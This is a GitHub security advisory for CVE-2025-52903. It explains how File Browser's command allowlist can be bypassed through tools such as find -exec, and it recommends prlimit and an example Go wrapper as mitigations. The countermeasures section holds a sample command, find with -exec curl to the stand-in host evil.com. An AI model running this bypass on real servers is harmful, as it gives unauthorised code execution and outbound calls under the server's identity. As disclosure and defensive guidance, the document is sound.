
filebrowser Allows Shell Commands to Spawn Other Commands

High severity GitHub Reviewed Published Jun 26, 2025 in filebrowser/filebrowser • Updated Aug 4, 2025

Package: gomod github.com/filebrowser/filebrowser (Go)
Affected versions: <= 1.11.0
Patched versions: None

Package: gomod github.com/filebrowser/filebrowser/v2 (Go)
Affected versions: < 2.33.10
Patched versions: 2.33.10

Description

Summary

The Command Execution feature of File Browser only allows the execution of shell commands that have been predefined on a user-specific allowlist. Many of these tools can themselves execute arbitrary other commands, rendering this limitation void.

Impact

The concrete impact depends on the commands granted to the attacker, but the large number of standard commands that can execute subcommands makes it likely that every user with the Execute commands permission can exploit this vulnerability. Everyone who can exploit it gains full code execution with the uid of the server process.

Vulnerability Description

Many Linux commands allow the execution of arbitrary other commands. For example, if a user is authorized to run only the find command and nothing else, this restriction can be circumvented with the -exec flag.

Some common commands that can launch external commands and that are included in the official container image of File Browser are listed below. The website https://gtfobins.github.io gives a comprehensive overview:

As a prerequisite, an attacker needs an account with the Execute Commands permission and some permitted commands.

Proof of Concept

The following screenshot demonstrates how this can be used to issue a network call to an external server:

[screenshot]

Recommended Countermeasures

Until this issue is fixed, we recommend completely disabling Execute commands for all accounts. Since command execution is an inherently dangerous feature that not all deployments use, it should be possible to disable it entirely in the application's configuration.

The prlimit command can be used to prevent the execution of subcommands:

$ find . -exec curl http://evil.com {} \;
<HTML>
<HEAD>
[...]

$ prlimit --nproc=0 find . -exec curl http://evil.com {} \;
find: cannot fork: Resource temporarily unavailable

It should be prepended to any command executed in the context of the application. prlimit can be used for containerized deployments as well as for bare-metal ones.
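As an added example (not code from the File Browser project), the wrapper below validates the first word of a user-supplied command line against a per-user allowlist and prepends prlimit --nproc=0 as recommended above; the Allowlist type, the function names and the example host are assumptions. It also refuses to run as uid 0, because the kernel does not enforce RLIMIT_NPROC for root (or for processes holding CAP_SYS_RESOURCE/CAP_SYS_ADMIN), so the limit would silently do nothing there.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"strings"
)

// Allowlist holds the command names a user may run (hypothetical stand-in for
// File Browser's per-user list; constructed for this example).
type Allowlist map[string]bool

// ErrRootNoNproc: RLIMIT_NPROC is skipped by the kernel for uid 0, so the
// prlimit wrapper gives no protection when the server itself runs as root.
var ErrRootNoNproc = errors.New("RLIMIT_NPROC is not enforced for uid 0; run the server unprivileged")

// WrapWithPrlimit checks the command name against the allowlist and returns
// the argv to execute, prefixed with `prlimit --nproc=0` so that the allowed
// command (and anything it tries to -exec) cannot fork. The line is split into
// words without a shell, so `;` for find -exec needs no escaping.
func WrapWithPrlimit(allow Allowlist, raw string) ([]string, error) {
	fields := strings.Fields(raw)
	if len(fields) == 0 {
		return nil, errors.New("empty command")
	}
	if !allow[fields[0]] {
		return nil, fmt.Errorf("command %q is not on the allowlist", fields[0])
	}
	return append([]string{"prlimit", "--nproc=0"}, fields...), nil
}

// Run executes the wrapped command and returns its combined output.
func Run(allow Allowlist, raw string) ([]byte, error) {
	if os.Geteuid() == 0 {
		return nil, ErrRootNoNproc
	}
	argv, err := WrapWithPrlimit(allow, raw)
	if err != nil {
		return nil, err
	}
	return exec.Command(argv[0], argv[1:]...).CombinedOutput()
}

func main() {
	allow := Allowlist{"find": true, "ls": true}
	// Constructed input with the same shape as the advisory's PoC; the host is a placeholder.
	out, err := Run(allow, "find . -exec curl http://example.invalid {} ;")
	fmt.Printf("output: %s\nerror: %v\n", out, err)
}
```

With the limit in place the inner curl fails with "cannot fork: Resource temporarily unavailable", as shown in the transcript above; the -delete caveat below still applies.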

WARNING: Note that this does not prevent all unexpected behavior of the authorized command itself. For example, the find command can also delete files directly via its -delete flag.

As a defense-in-depth measure, Filebrowser should provide an additional container image based on a distroless base image.

Timeline

  • 2025-03-26 Identified the vulnerability in version 2.32.0
  • 2025-06-25 Uploaded advisories to the project's GitHub repository
  • 2025-06-25 CVE ID assigned by GitHub
  • 2025-06-25 A patch version has been pushed that disables the feature for all existing installations and makes it opt-in. A warning has been added to the documentation and is printed on the console if the feature is enabled. Because the project is in maintenance-only mode, the bug itself has not been fixed. The fix is tracked in filebrowser/filebrowser#5199.

@hacdias hacdias published to filebrowser/filebrowser Jun 26, 2025
Published by the National Vulnerability Database Jun 26, 2025
Published to the GitHub Advisory Database Jun 27, 2025
Reviewed Jun 27, 2025
Last updated Aug 4, 2025

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
High
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(35th percentile)

Weaknesses

Improper Neutralization of Special Elements used in a Command ('Command Injection')

The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.

Permissive List of Allowed Inputs

The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive, that is, it allows an input that is unsafe, leading to resultant weaknesses.

Exposed Dangerous Method or Function

The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.

CVE ID

CVE-2025-52903

GHSA ID

GHSA-3q2w-42mv-cph4
